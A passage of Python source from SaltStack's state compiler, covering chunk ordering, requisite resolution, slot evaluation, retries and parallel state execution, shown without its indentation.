if not fun:
if state == "require" or state == "watch":
continue
errors.append(
"No function declared in state '{}' in SLS '{}'".format(
state, body["__sls__"]
)
)
elif fun > 1:
errors.append(
"Too many functions declared in state '{}' in "
"SLS '{}'".format(state, body["__sls__"])
)
return errors
def verify_chunks(self, chunks):
"""
Verify the chunks in a list of low data structures
"""
err = []
for chunk in chunks:
err.extend(self.verify_data(chunk))
return err
def order_chunks(self, chunks):
"""
Sort the chunk list verifying that the chunks follow the order
specified in the order options.
"""
cap = 1
for chunk in chunks:
if "order" in chunk:
if not isinstance(chunk["order"], int):
continue
chunk_order = chunk["order"]
if chunk_order > cap - 1 and chunk_order > 0:
cap = chunk_order + 100
for chunk in chunks:
if "order" not in chunk:
chunk["order"] = cap
continue
if not isinstance(chunk["order"], (int, float)):
if chunk["order"] == "last":
chunk["order"] = cap + 1000000
elif chunk["order"] == "first":
chunk["order"] = 0
else:
chunk["order"] = cap
if "name_order" in chunk:
chunk["order"] = chunk["order"] + chunk.pop("name_order") / 10000.0
if chunk["order"] < 0:
chunk["order"] = cap + 1000000 + chunk["order"]
chunks.sort(
key=lambda chunk: (
chunk["order"],
"{0[state]}{0[name]}{0[fun]}".format(chunk),
)
)
return chunks
def compile_high_data(self, high, orchestration_jid=None):
"""
"Compile" the high data as it is retrieved from the CLI or YAML into
the individual state executor structures
"""
chunks = []
for name, body in high.items():
if name.startswith("__"):
continue
for state, run in body.items():
funcs = set()
names = []
if state.startswith("__"):
continue
chunk = {"state": state, "name": name}
if orchestration_jid is not None:
chunk["__orchestration_jid__"] = orchestration_jid
if "__sls__" in body:
chunk["__sls__"] = body["__sls__"]
if "__env__" in body:
chunk["__env__"] = body["__env__"]
chunk["__id__"] = name
for arg in run:
if isinstance(arg, str):
funcs.add(arg)
continue
if isinstance(arg, dict):
for key, val in arg.items():
if key == "names":
for _name in val:
if _name not in names:
names.append(_name)
elif key == "state":
# Don't pass down a state override
continue
elif key == "name" and not isinstance(val, str):
# Invalid name, fall back to ID
chunk[key] = name
else:
chunk[key] = val
if names:
name_order = 1
for entry in names:
live = copy.deepcopy(chunk)
if isinstance(entry, dict):
low_name = next(iter(entry.keys()))
live["name"] = low_name
list(map(live.update, entry[low_name]))
else:
live["name"] = entry
live["name_order"] = name_order
name_order += 1
for fun in funcs:
live["fun"] = fun
chunks.append(live)
else:
live = copy.deepcopy(chunk)
for fun in funcs:
live["fun"] = fun
chunks.append(live)
chunks = self.order_chunks(chunks)
return chunks
def reconcile_extend(self, high):
"""
Pull the extend data and add it to the respective high data
"""
errors = []
if "__extend__" not in high:
return high, errors
ext = high.pop("__extend__")
for ext_chunk in ext:
for name, body in ext_chunk.items():
if name not in high:
state_type = next(x for x in body if not x.startswith("__"))
# Check for a matching 'name' override in high data
ids = find_name(name, state_type, high)
if len(ids) != 1:
errors.append(
"Cannot extend ID '{0}' in '{1}:{2}'. It is not "
"part of the high state.\n"
"This is likely due to a missing include statement "
"or an incorrectly typed ID.\nEnsure that a "
"state with an ID of '{0}' is available\nin "
"environment '{1}' and to SLS '{2}'".format(
name,
body.get("__env__", "base"),
body.get("__sls__", "base"),
)
)
continue
else:
name = ids[0][0]
for state, run in body.items():
if state.startswith("__"):
continue
if state not in high[name]:
high[name][state] = run
continue
# high[name][state] is extended by run, both are lists
for arg in run:
update = False
for hind in range(len(high[name][state])):
if isinstance(arg, str) and isinstance(
high[name][state][hind], str
):
# replacing the function, replace the index
high[name][state].pop(hind)
high[name][state].insert(hind, arg)
update = True
continue
if isinstance(arg, dict) and isinstance(
high[name][state][hind], dict
):
# It is an option, make sure the options match
argfirst = next(iter(arg))
if argfirst == next(iter(high[name][state][hind])):
# If argfirst is a requisite then we must merge
# our requisite with that of the target state
if argfirst in STATE_REQUISITE_KEYWORDS:
high[name][state][hind][argfirst].extend(
arg[argfirst]
)
                                    # otherwise, it's not a requisite and we are just extending (replacing)
else:
high[name][state][hind] = arg
update = True
if (
argfirst == "name"
and next(iter(high[name][state][hind])) == "names"
):
# If names are overwritten by name use the name
high[name][state][hind] = arg
if not update:
high[name][state].append(arg)
return high, errors
def apply_exclude(self, high):
"""
Read in the __exclude__ list and remove all excluded objects from the
high data
"""
if "__exclude__" not in high:
return high
ex_sls = set()
ex_id = set()
exclude = high.pop("__exclude__")
for exc in exclude:
if isinstance(exc, str):
# The exclude statement is a string, assume it is an sls
ex_sls.add(exc)
if isinstance(exc, dict):
# Explicitly declared exclude
if len(exc) != 1:
continue
key = next(iter(exc.keys()))
if key == "sls":
ex_sls.add(exc["sls"])
elif key == "id":
ex_id.add(exc["id"])
# Now the excludes have been simplified, use them
if ex_sls:
# There are sls excludes, find the associated ids
for name, body in high.items():
if name.startswith("__"):
continue
sls = body.get("__sls__", "")
if not sls:
continue
for ex_ in ex_sls:
if fnmatch.fnmatch(sls, ex_):
ex_id.add(name)
for id_ in ex_id:
if id_ in high:
high.pop(id_)
return high
def requisite_in(self, high):
"""
Extend the data reference with requisite_in arguments
"""
req_in = {
"require_in",
"watch_in",
"onfail_in",
"onchanges_in",
"use",
"use_in",
"prereq",
"prereq_in",
}
req_in_all = req_in.union(
{"require", "watch", "onfail", "onfail_stop", "onchanges"}
)
extend = {}
errors = []
disabled_reqs = self.opts.get("disabled_requisites", [])
if not isinstance(disabled_reqs, list):
disabled_reqs = [disabled_reqs]
for id_, body in high.items():
if not isinstance(body, dict):
continue
for state, run in body.items():
if state.startswith("__"):
continue
for arg in run:
if isinstance(arg, dict):
# It is not a function, verify that the arg is a
# requisite in statement
if len(arg) < 1:
# Empty arg dict
# How did we get this far?
continue
# Split out the components
key = next(iter(arg))
if key not in req_in:
continue
if key in disabled_reqs:
log.warning(
"The %s requisite has been disabled, Ignoring.", key
)
continue
rkey = key.split("_")[0]
items = arg[key]
if isinstance(items, dict):
# Formatted as a single req_in
for _state, name in items.items():
# Not a use requisite_in
found = False
if name not in extend:
extend[name] = OrderedDict()
if "." in _state:
errors.append(
"Invalid requisite in {}: {} for "
"{}, in SLS '{}'. Requisites must "
"not contain dots, did you mean '{}'?".format(
rkey,
_state,
name,
body["__sls__"],
_state[: _state.find(".")],
)
)
_state = _state.split(".")[0]
if _state not in extend[name]:
extend[name][_state] = []
extend[name]["__env__"] = body["__env__"]
extend[name]["__sls__"] = body["__sls__"]
for ind in range(len(extend[name][_state])):
if next(iter(extend[name][_state][ind])) == rkey:
# Extending again
extend[name][_state][ind][rkey].append(
{state: id_}
)
found = True
if found:
continue
# The rkey is not present yet, create it
extend[name][_state].append({rkey: [{state: id_}]})
if isinstance(items, list):
# Formed as a list of requisite additions
hinges = []
for ind in items:
if not isinstance(ind, dict):
# Malformed req_in
if ind in high:
_ind_high = [
x
for x in high[ind]
if not x.startswith("__")
]
ind = {_ind_high[0]: ind}
else:
found = False
for _id in iter(high):
for state in [
state
for state in iter(high[_id])
if not state.startswith("__")
]:
for j in iter(high[_id][state]):
if (
isinstance(j, dict)
and "name" in j
):
if j["name"] == ind:
ind = {state: _id}
found = True
if not found:
continue
if len(ind) < 1:
continue
pstate = next(iter(ind))
pname = ind[pstate]
if pstate == "sls":
# Expand hinges here
hinges = find_sls_ids(pname, high)
else:
hinges.append((pname, pstate))
if "." in pstate:
errors.append(
"Invalid requisite in {}: {} for "
"{}, in SLS '{}'. Requisites must "
"not contain dots, did you mean '{}'?".format(
rkey,
pstate,
pname,
body["__sls__"],
pstate[: pstate.find(".")],
)
)
pstate = pstate.split(".")[0]
for tup in hinges:
name, _state = tup
if key == "prereq_in":
# Add prerequired to origin
if id_ not in extend:
extend[id_] = OrderedDict()
if state not in extend[id_]:
extend[id_][state] = []
extend[id_][state].append(
{"prerequired": [{_state: name}]}
)
if key == "prereq":
# Add prerequired to prereqs
ext_ids = find_name(name, _state, high)
for ext_id, _req_state in ext_ids:
if ext_id not in extend:
extend[ext_id] = OrderedDict()
if _req_state not in extend[ext_id]:
extend[ext_id][_req_state] = []
extend[ext_id][_req_state].append(
{"prerequired": [{state: id_}]}
)
continue
if key == "use_in":
# Add the running states args to the
# use_in states
ext_ids = find_name(name, _state, high)
for ext_id, _req_state in ext_ids:
if not ext_id:
continue
ext_args = state_args(ext_id, _state, high)
if ext_id not in extend:
extend[ext_id] = OrderedDict()
if _req_state not in extend[ext_id]:
extend[ext_id][_req_state] = []
ignore_args = req_in_all.union(ext_args)
for arg in high[id_][state]:
if not isinstance(arg, dict):
continue
if len(arg) != 1:
continue
if next(iter(arg)) in ignore_args:
continue
# Don't use name or names
if next(iter(arg.keys())) == "name":
continue
if next(iter(arg.keys())) == "names":
continue
extend[ext_id][_req_state].append(arg)
continue
if key == "use":
# Add the use state's args to the
# running state
ext_ids = find_name(name, _state, high)
for ext_id, _req_state in ext_ids:
if not ext_id:
continue
loc_args = state_args(id_, state, high)
if id_ not in extend:
extend[id_] = OrderedDict()
if state not in extend[id_]:
extend[id_][state] = []
ignore_args = req_in_all.union(loc_args)
for arg in high[ext_id][_req_state]:
if not isinstance(arg, dict):
continue
if len(arg) != 1:
continue
if next(iter(arg)) in ignore_args:
continue
# Don't use name or names
if next(iter(arg.keys())) == "name":
continue
if next(iter(arg.keys())) == "names":
continue
extend[id_][state].append(arg)
continue
found = False
if name not in extend:
extend[name] = OrderedDict()
if _state not in extend[name]:
extend[name][_state] = []
extend[name]["__env__"] = body["__env__"]
extend[name]["__sls__"] = body["__sls__"]
for ind in range(len(extend[name][_state])):
if (
next(iter(extend[name][_state][ind]))
== rkey
):
# Extending again
extend[name][_state][ind][rkey].append(
{state: id_}
)
found = True
if found:
continue
# The rkey is not present yet, create it
extend[name][_state].append({rkey: [{state: id_}]})
high["__extend__"] = []
for key, val in extend.items():
high["__extend__"].append({key: val})
req_in_high, req_in_errors = self.reconcile_extend(high)
errors.extend(req_in_errors)
return req_in_high, errors
def _call_parallel_target(self, name, cdata, low):
"""
The target function to call that will create the parallel thread/process
"""
# we need to re-record start/end duration here because it is impossible to
# correctly calculate further down the chain
utc_start_time = datetime.datetime.utcnow()
self.format_slots(cdata)
tag = _gen_tag(low)
try:
ret = self.states[cdata["full"]](*cdata["args"], **cdata["kwargs"])
except Exception as exc: # pylint: disable=broad-except
log.debug(
"An exception occurred in this state: %s",
exc,
exc_info_on_loglevel=logging.DEBUG,
)
trb = traceback.format_exc()
ret = {
"result": False,
"name": name,
"changes": {},
"comment": "An exception occurred in this state: {}".format(trb),
}
utc_finish_time = datetime.datetime.utcnow()
delta = utc_finish_time - utc_start_time
# duration in milliseconds.microseconds
duration = (delta.seconds * 1000000 + delta.microseconds) / 1000.0
ret["duration"] = duration
troot = os.path.join(self.opts["cachedir"], self.jid)
tfile = os.path.join(troot, salt.utils.hashutils.sha1_digest(tag))
if not os.path.isdir(troot):
try:
os.makedirs(troot)
except OSError:
# Looks like the directory was created between the check
# and the attempt, we are safe to pass
pass
with salt.utils.files.fopen(tfile, "wb+") as fp_:
fp_.write(msgpack_serialize(ret))
def call_parallel(self, cdata, low):
"""
Call the state defined in the given cdata in parallel
"""
# There are a number of possibilities to not have the cdata
# populated with what we might have expected, so just be smart
# enough to not raise another KeyError as the name is easily
        # guessable and fall back in all cases to present the real
# exception to the user
name = (cdata.get("args") or [None])[0] or cdata["kwargs"].get("name")
if not name:
name = low.get("name", low.get("__id__"))
proc = salt.utils.process.Process(
target=self._call_parallel_target, args=(name, cdata, low)
)
proc.start()
ret = {
"name": name,
"result": None,
"changes": {},
"comment": "Started in a separate process",
"proc": proc,
}
return ret
@salt.utils.decorators.state.OutputUnifier("content_check", "unify")
def call(self, low, chunks=None, running=None, retries=1):
"""
Call a state directly with the low data structure, verify data
before processing.
"""
utc_start_time = datetime.datetime.utcnow()
local_start_time = utc_start_time - (
datetime.datetime.utcnow() - datetime.datetime.now()
)
log.info(
"Running state [%s] at time %s",
low["name"].strip() if isinstance(low["name"], str) else low["name"],
local_start_time.time().isoformat(),
)
errors = self.verify_data(low)
if errors:
ret = {
"result": False,
"name": low["name"],
"changes": {},
"comment": "",
}
for err in errors:
ret["comment"] += "{}\n".format(err)
ret["__run_num__"] = self.__run_num
self.__run_num += 1
format_log(ret)
self.check_refresh(low, ret)
return ret
else:
ret = {"result": False, "name": low["name"], "changes": {}}
self.state_con["runas"] = low.get("runas", None)
if low["state"] == "cmd" and "password" in low:
self.state_con["runas_password"] = low["password"]
else:
self.state_con["runas_password"] = low.get("runas_password", None)
if not low.get("__prereq__"):
log.info(
"Executing state %s.%s for [%s]",
low["state"],
low["fun"],
low["name"].strip() if isinstance(low["name"], str) else low["name"],
)
if "provider" in low:
self.load_modules(low)
state_func_name = "{0[state]}.{0[fun]}".format(low)
cdata = salt.utils.args.format_call(
self.states[state_func_name],
low,
initial_ret={"full": state_func_name},
expected_extra_kws=STATE_INTERNAL_KEYWORDS,
)
inject_globals = {
# Pass a copy of the running dictionary, the low state chunks and
# the current state dictionaries.
# We pass deep copies here because we don't want any misbehaving
# state module to change these at runtime.
"__low__": immutabletypes.freeze(low),
"__running__": immutabletypes.freeze(running) if running else {},
"__instance_id__": self.instance_id,
"__lowstate__": immutabletypes.freeze(chunks) if chunks else {},
}
if "__env__" in low:
inject_globals["__env__"] = str(low["__env__"])
if self.inject_globals:
inject_globals.update(self.inject_globals)
if low.get("__prereq__"):
test = sys.modules[self.states[cdata["full"]].__module__].__opts__["test"]
sys.modules[self.states[cdata["full"]].__module__].__opts__["test"] = True
try:
# Let's get a reference to the salt environment to use within this
# state call.
#
# If the state function accepts an 'env' keyword argument, it
            # allows the state to be overridden (we look for that in cdata). If
# that's not found in cdata, we look for what we're being passed in
# the original data, namely, the special dunder __env__. If that's
# not found we default to 'base'
req_list = ("unless", "onlyif", "creates")
if (
any(req in low for req in req_list)
and "{0[state]}.mod_run_check".format(low) not in self.states
):
ret.update(self._run_check(low))
if not self.opts.get("lock_saltenv", False):
# NOTE: Overriding the saltenv when lock_saltenv is blocked in
# salt/modules/state.py, before we ever get here, but this
# additional check keeps use of the State class outside of the
# salt/modules/state.py from getting around this setting.
if "saltenv" in low:
inject_globals["__env__"] = str(low["saltenv"])
elif isinstance(cdata["kwargs"].get("env", None), str):
# User is using a deprecated env setting which was parsed by
# format_call.
# We check for a string type since module functions which
# allow setting the OS environ also make use of the "env"
# keyword argument, which is not a string
inject_globals["__env__"] = str(cdata["kwargs"]["env"])
if "__env__" not in inject_globals:
# Let's use the default environment
inject_globals["__env__"] = "base"
if "__orchestration_jid__" in low:
inject_globals["__orchestration_jid__"] = low["__orchestration_jid__"]
if "result" not in ret or ret["result"] is False:
self.states.inject_globals = inject_globals
if self.mocked:
ret = mock_ret(cdata)
else:
# Execute the state function
if not low.get("__prereq__") and low.get("parallel"):
# run the state call in parallel, but only if not in a prereq
ret = self.call_parallel(cdata, low)
else:
self.format_slots(cdata)
ret = self.states[cdata["full"]](
*cdata["args"], **cdata["kwargs"]
)
self.states.inject_globals = {}
if (
"check_cmd" in low
and "{0[state]}.mod_run_check_cmd".format(low) not in self.states
):
ret.update(self._run_check_cmd(low))
except Exception as exc: # pylint: disable=broad-except
log.debug(
"An exception occurred in this state: %s",
exc,
exc_info_on_loglevel=logging.DEBUG,
)
trb = traceback.format_exc()
# There are a number of possibilities to not have the cdata
# populated with what we might have expected, so just be smart
# enough to not raise another KeyError as the name is easily
            # guessable and fall back in all cases to present the real
# exception to the user
name = (cdata.get("args") or [None])[0] or cdata["kwargs"].get("name")
if not name:
name = low.get("name", low.get("__id__"))
ret = {
"result": False,
"name": name,
"changes": {},
"comment": "An exception occurred in this state: {}".format(trb),
}
finally:
if low.get("__prereq__"):
sys.modules[self.states[cdata["full"]].__module__].__opts__[
"test"
] = test
self.state_con.pop("runas", None)
self.state_con.pop("runas_password", None)
if not isinstance(ret, dict):
return ret
# If format_call got any warnings, let's show them to the user
if "warnings" in cdata:
ret.setdefault("warnings", []).extend(cdata["warnings"])
if "provider" in low:
self.load_modules()
if low.get("__prereq__"):
low["__prereq__"] = False
return ret
ret["__sls__"] = low.get("__sls__")
ret["__run_num__"] = self.__run_num
self.__run_num += 1
format_log(ret)
self.check_refresh(low, ret)
utc_finish_time = datetime.datetime.utcnow()
timezone_delta = datetime.datetime.utcnow() - datetime.datetime.now()
local_finish_time = utc_finish_time - timezone_delta
local_start_time = utc_start_time - timezone_delta
ret["start_time"] = local_start_time.time().isoformat()
delta = utc_finish_time - utc_start_time
# duration in milliseconds.microseconds
duration = (delta.seconds * 1000000 + delta.microseconds) / 1000.0
ret["duration"] = duration
ret["__id__"] = low["__id__"]
log.info(
"Completed state [%s] at time %s (duration_in_ms=%s)",
low["name"].strip() if isinstance(low["name"], str) else low["name"],
local_finish_time.time().isoformat(),
duration,
)
if "retry" in low:
low["retry"] = self.verify_retry_data(low["retry"])
if not sys.modules[self.states[cdata["full"]].__module__].__opts__["test"]:
if low["retry"]["until"] != ret["result"]:
if low["retry"]["attempts"] > retries:
interval = low["retry"]["interval"]
if low["retry"]["splay"] != 0:
interval = interval + random.randint(
0, low["retry"]["splay"]
)
log.info(
"State result does not match retry until value, "
"state will be re-run in %s seconds",
interval,
)
self.functions["test.sleep"](interval)
retry_ret = self.call(low, chunks, running, retries=retries + 1)
orig_ret = ret
ret = retry_ret
ret["comment"] = "\n".join(
[
(
'Attempt {}: Returned a result of "{}", '
'with the following comment: "{}"'.format(
retries, orig_ret["result"], orig_ret["comment"]
)
),
"" if not ret["comment"] else ret["comment"],
]
)
ret["duration"] = (
ret["duration"] + orig_ret["duration"] + (interval * 1000)
)
if retries == 1:
ret["start_time"] = orig_ret["start_time"]
else:
ret["comment"] = " ".join(
[
"" if not ret["comment"] else str(ret["comment"]),
(
"The state would be retried every {1} seconds "
"(with a splay of up to {3} seconds) "
"a maximum of {0} times or until a result of {2} "
"is returned"
).format(
low["retry"]["attempts"],
low["retry"]["interval"],
low["retry"]["until"],
low["retry"]["splay"],
),
]
)
return ret
def __eval_slot(self, slot):
log.debug("Evaluating slot: %s", slot)
fmt = slot.split(":", 2)
if len(fmt) != 3:
log.warning("Malformed slot: %s", slot)
return slot
if fmt[1] != "salt":
log.warning("Malformed slot: %s", slot)
log.warning(
"Only execution modules are currently supported in slots. This means slot "
'should start with "__slot__:salt:"'
)
return slot
fun, args, kwargs = salt.utils.args.parse_function(fmt[2])
if not fun or fun not in self.functions:
log.warning("Malformed slot: %s", slot)
log.warning(
"Execution module should be specified in a function call format: "
"test.arg('arg', kw='kwarg')"
)
return slot
log.debug("Calling slot: %s(%s, %s)", fun, args, kwargs)
slot_return = self.functions[fun](*args, **kwargs)
# Given input __slot__:salt:test.arg(somekey="value").not.exist ~ /appended
# slot_text should be __slot...).not.exist
# append_data should be ~ /appended
slot_text = fmt[2].split("~")[0]
append_data = fmt[2].split("~", 1)[1:]
log.debug("slot_text: %s", slot_text)
log.debug("append_data: %s", append_data)
# Support parsing slot dict response
# return_get should result in a kwargs.nested.dict path by getting
# everything after first closing paren: )
return_get = None
try:
return_get = slot_text[slot_text.rindex(")") + 1 :]
except ValueError:
pass
if return_get:
# remove first period
return_get = return_get.split(".", 1)[1].strip()
log.debug("Searching slot result %s for %s", slot_return, return_get)
slot_return = salt.utils.data.traverse_dict_and_list(
slot_return, return_get, default=None, delimiter="."
)
if append_data:
if isinstance(slot_return, str):
# Append text to slot string result
append_data = " ".join(append_data).strip()
log.debug("appending to slot result: %s", append_data)
slot_return += append_data
else:
log.error("Ignoring slot append, slot result is not a string")
return slot_return
def format_slots(self, cdata):
"""
        Read in the arguments from the low-level slot syntax to make a
        last-minute runtime call to gather relevant data for the specific
        routine. Will parse strings, first-level dictionary values, and
        strings and first-level dict values inside of lists.
"""
        # __slot__:salt:cmd.run(foo, bar, baz=qux)
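        # A slightly fuller, hypothetical illustration of the syntax that
        # __eval_slot() accepts, i.e. "__slot__:salt:<module>.<function>(<args>)",
        # optionally followed by ".key.path" to traverse a dict return value
        # and "~ text" to append literal text to a string result:
        #
        #   __slot__:salt:test.arg(somekey="value").kwargs.somekey ~ _suffix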
SLOT_TEXT = "__slot__:"
ctx = (("args", enumerate(cdata["args"])), ("kwargs", cdata["kwargs"].items()))
for atype, avalues in ctx:
for ind, arg in avalues:
arg = salt.utils.data.decode(arg, keep=True)
if isinstance(arg, dict):
# Search dictionary values for __slot__:
for key, value in arg.items():
try:
if value.startswith(SLOT_TEXT):
log.trace("Slot processsing dict value %s", value)
cdata[atype][ind][key] = self.__eval_slot(value)
except AttributeError:
# Not a string/slot
continue
elif isinstance(arg, list):
for idx, listvalue in enumerate(arg):
log.trace("Slot processing list value: %s", listvalue)
if isinstance(listvalue, dict):
# Search dict values in list for __slot__:
for key, value in listvalue.items():
try:
if value.startswith(SLOT_TEXT):
log.trace(
"Slot processsing nested dict value %s",
value,
)
cdata[atype][ind][idx][key] = self.__eval_slot(
value
)
except AttributeError:
# Not a string/slot
continue
if isinstance(listvalue, str):
# Search strings in a list for __slot__:
if listvalue.startswith(SLOT_TEXT):
log.trace(
"Slot processsing nested string %s", listvalue
)
cdata[atype][ind][idx] = self.__eval_slot(listvalue)
elif isinstance(arg, str) and arg.startswith(SLOT_TEXT):
# Search strings for __slot__:
log.trace("Slot processsing %s", arg)
cdata[atype][ind] = self.__eval_slot(arg)
else:
# Not a slot, skip it
continue
def verify_retry_data(self, retry_data):
"""
verifies the specified retry data
"""
retry_defaults = {
"until": True,
"attempts": 2,
"splay": 0,
"interval": 30,
}
expected_data = {
"until": bool,
"attempts": int,
"interval": int,
"splay": int,
}
validated_retry_data = {}
if isinstance(retry_data, dict):
for expected_key, value_type in expected_data.items():
if expected_key in retry_data:
if isinstance(retry_data[expected_key], value_type):
validated_retry_data[expected_key] = retry_data[expected_key]
else:
log.warning(
"An invalid value was passed for the retry %s, "
"using default value '%s'",
expected_key,
retry_defaults[expected_key],
)
validated_retry_data[expected_key] = retry_defaults[
expected_key
]
else:
validated_retry_data[expected_key] = retry_defaults[expected_key]
else:
log.warning(
"State is set to retry, but a valid dict for retry "
"configuration was not found. Using retry defaults"
)
validated_retry_data = retry_defaults
return validated_retry_data
def call_chunks(self, chunks):
"""
Iterate over a list of chunks and call them, checking for requires.
"""
# Check for any disabled states
disabled = {}
if "state_runs_disabled" in self.opts["grains"]:
for low in chunks[:]:
state_ = "{}.{}".format(low["state"], low["fun"])
for pat in self.opts["grains"]["state_runs_disabled"]:
if fnmatch.fnmatch(state_, pat):
                        comment = (
                            'The state function "{0}" is currently disabled by "{1}". '
                            "To re-enable, run state.enable {1}."
                        ).format(state_, pat)
_tag = _gen_tag(low)
disabled[_tag] = {
"changes": {},
"result": False,
"comment": comment,
"__run_num__": self.__run_num,
"__sls__": low["__sls__"],
}
self.__run_num += 1
chunks.remove(low)
break
running = {}
for low in chunks:
if "__FAILHARD__" in running:
running.pop("__FAILHARD__")
return running
tag = _gen_tag(low)
if tag not in running:
# Check if this low chunk is paused
action = self.check_pause(low)
if action == "kill":
break
running = self.call_chunk(low, running, chunks)
if self.check_failhard(low, running):
return running
self.active = set()
while True:
if self.reconcile_procs(running):
break
time.sleep(0.01)
ret = dict(list(disabled.items()) + list(running.items()))
return ret
def check_failhard(self, low, running):
"""
Check if the low data chunk should send a failhard signal
"""
tag = _gen_tag(low)
if self.opts.get("test", False):
return False
if low.get("failhard", self.opts["failhard"]) and tag in running:
if running[tag]["result"] is None:
return False
return not running[tag]["result"]
return False
def check_pause(self, low):
"""
Check to see if this low chunk has been paused
"""
if not self.jid:
# Can't pause on salt-ssh since we can't track continuous state
return
pause_path = os.path.join(self.opts["cachedir"], "state_pause", self.jid)
start = time.time()
if os.path.isfile(pause_path):
try:
                tries = 0
                while True:
with salt.utils.files.fopen(pause_path, "rb") as fp_:
try:
pdat = msgpack_deserialize(fp_.read())
except salt.utils.msgpack.exceptions.UnpackValueError:
# Reading race condition
if tries > 10:
# Break out if there are a ton of read errors
return
tries += 1
time.sleep(1)
continue
id_ = low["__id__"]
key = ""
if id_ in pdat:
key = id_
elif "__all__" in pdat:
key = "__all__"
if key:
if "duration" in pdat[key]:
now = time.time()
if now - start > pdat[key]["duration"]:
return "run"
if "kill" in pdat[key]:
return "kill"
else:
return "run"
time.sleep(1)
except Exception as exc: # pylint: disable=broad-except
log.error(
"Failed to read in pause data for file located at: %s", pause_path
)
return "run"
return "run"
def reconcile_procs(self, running):
"""
Check the running dict for processes and resolve them
"""
retset = set()
for tag in running:
proc = running[tag].get("proc")
if proc:
if not proc.is_alive():
ret_cache = os.path.join(
self.opts["cachedir"],
self.jid,
salt.utils.hashutils.sha1_digest(tag),
)
if not os.path.isfile(ret_cache):
ret = {
"result": False,
"comment": "Parallel process failed to return",
"name": running[tag]["name"],
"changes": {},
}
try:
with salt.utils.files.fopen(ret_cache, "rb") as fp_:
ret = msgpack_deserialize(fp_.read())
except OSError:
ret = {
"result": False,
"comment": "Parallel cache failure",
"name": running[tag]["name"],
"changes": {},
}
running[tag].update(ret)
running[tag].pop("proc")
else:
retset.add(False)
return False not in retset
def check_requisite(self, low, running, chunks, pre=False):
"""
Look into the running data to check the status of all requisite
states
"""
disabled_reqs = self.opts.get("disabled_requisites", [])
if not isinstance(disabled_reqs, list):
disabled_reqs = [disabled_reqs]
present = False
# If mod_watch is not available make it a require
if "watch" in low:
if "{}.mod_watch".format(low["state"]) not in self.states:
if "require" in low:
low["require"].extend(low.pop("watch"))
else:
low["require"] = low.pop("watch")
else:
present = True
if "watch_any" in low:
if "{}.mod_watch".format(low["state"]) not in self.states:
if "require_any" in low:
low["require_any"].extend(low.pop("watch_any"))
else:
low["require_any"] = low.pop("watch_any")
else:
present = True
if "require" in low:
present = True
if "require_any" in low:
present = True
if "prerequired" in low:
present = True
if "prereq" in low:
present = True
if "onfail" in low:
present = True
if "onfail_any" in low:
present = True
if "onfail_all" in low:
present = True
if "onchanges" in low:
present = True
if "onchanges_any" in low:
present = True
if not present:
return "met", ()
self.reconcile_procs(running)
reqs = {
"require": [],
"require_any": [],
"watch": [],
"watch_any": [],
"prereq": [],
"onfail": [],
"onfail_any": [],
"onfail_all": [],
"onchanges": [],
"onchanges_any": [],
}
if pre:
reqs["prerequired"] = []
for r_state in reqs:
if r_state in low and low[r_state] is not None:
if r_state in disabled_reqs:
log.warning(
"The %s requisite has been disabled, Ignoring.", r_state
)
continue
for req in low[r_state]:
if isinstance(req, str):
req = {"id": req}
req = trim_req(req)
found = False
for chunk in chunks:
req_key = next(iter(req))
req_val = req[req_key]
if req_val is None:
continue
if req_key == "sls":
# Allow requisite tracking of entire sls files
if fnmatch.fnmatch(chunk["__sls__"], req_val):
found = True
reqs[r_state].append(chunk)
continue
try:
if isinstance(req_val, str):
if fnmatch.fnmatch(
chunk["name"], req_val
) or fnmatch.fnmatch(chunk["__id__"], req_val):
if req_key == "id" or chunk["state"] == req_key:
found = True
reqs[r_state].append(chunk)
else:
raise KeyError
except KeyError as exc:
raise SaltRenderError(
"Could not locate requisite of [{}] present in state with name [{}]".format(
req_key, chunk["name"]
)
)
except TypeError:
# On Python 2, the above req_val, being an OrderedDict, will raise a KeyError,
# however on Python 3 it will raise a TypeError
# This was found when running tests.unit.test_state.StateCompilerTestCase.test_render_error_on_invalid_requisite
raise SaltRenderError(
"Could not locate requisite of [{}] present in state with name [{}]".format(
req_key, chunk["name"]
)
)
if not found:
return "unmet", ()
fun_stats = set()
for r_state, chunks in reqs.items():
req_stats = set()
if r_state.startswith("prereq") and not r_state.startswith("prerequired"):
run_dict = self.pre
else:
run_dict = running
filtered_run_dict = {}
for chunk in chunks:
tag = _gen_tag(chunk)
run_dict_chunk = run_dict.get(tag)
if run_dict_chunk:
filtered_run_dict[tag] = run_dict_chunk
run_dict = filtered_run_dict
while True:
if self.reconcile_procs(run_dict):
break
time.sleep(0.01)
for chunk in chunks:
tag = _gen_tag(chunk)
if tag not in run_dict:
req_stats.add("unmet")
continue
if r_state.startswith("onfail"):
if run_dict[tag]["result"] is True:
req_stats.add("onfail") # At least one state is OK
continue
else:
if run_dict[tag]["result"] is False:
req_stats.add("fail")
continue
if r_state.startswith("onchanges"):
if not run_dict[tag]["changes"]:
req_stats.add("onchanges")
else:
req_stats.add("onchangesmet")
continue
if r_state.startswith("watch") and run_dict[tag]["changes"]:
req_stats.add("change")
continue
if r_state.startswith("prereq") and run_dict[tag]["result"] is None:
if not r_state.startswith("prerequired"):
req_stats.add("premet")
if r_state.startswith("prereq") and not run_dict[tag]["result"] is None:
if not r_state.startswith("prerequired"):
req_stats.add("pre")
else:
if run_dict[tag].get("__state_ran__", True):
req_stats.add("met")
if r_state.endswith("_any") or r_state == "onfail":
if "met" in req_stats or "change" in req_stats:
if "fail" in req_stats:
req_stats.remove("fail")
if "onchangesmet" in req_stats:
if "onchanges" in req_stats:
req_stats.remove("onchanges")
if "fail" in req_stats:
req_stats.remove("fail")
if "onfail" in req_stats:
# a met requisite in this case implies a success
if "met" in req_stats:
req_stats.remove("onfail")
if r_state.endswith("_all"):
if "onfail" in req_stats:
# a met requisite in this case implies a failure
if "met" in req_stats:
req_stats.remove("met")
fun_stats.update(req_stats)
if "unmet" in fun_stats:
status = "unmet"
elif "fail" in fun_stats:
status = "fail"
elif "pre" in fun_stats:
if "premet" in fun_stats:
status = "met"
else:
status = "pre"
elif "onfail" in fun_stats and "onchangesmet" not in fun_stats:
status = "onfail"
elif "onchanges" in fun_stats and "onchangesmet" not in fun_stats:
status = "onchanges"
elif "change" in fun_stats:
status = "change"
else:
status = "met"
return status, reqs
def event(self, chunk_ret, length, fire_event=False):
"""
Fire an event on the master bus
If `fire_event` is set to True an event will be sent with the
chunk name in the tag and the chunk result in the event data.
If `fire_event` is set to a string such as `mystate/is/finished`,
an event will be sent with the string added to the tag and the chunk
result in the event data.
        If `state_events` is set to True in the config, then after the
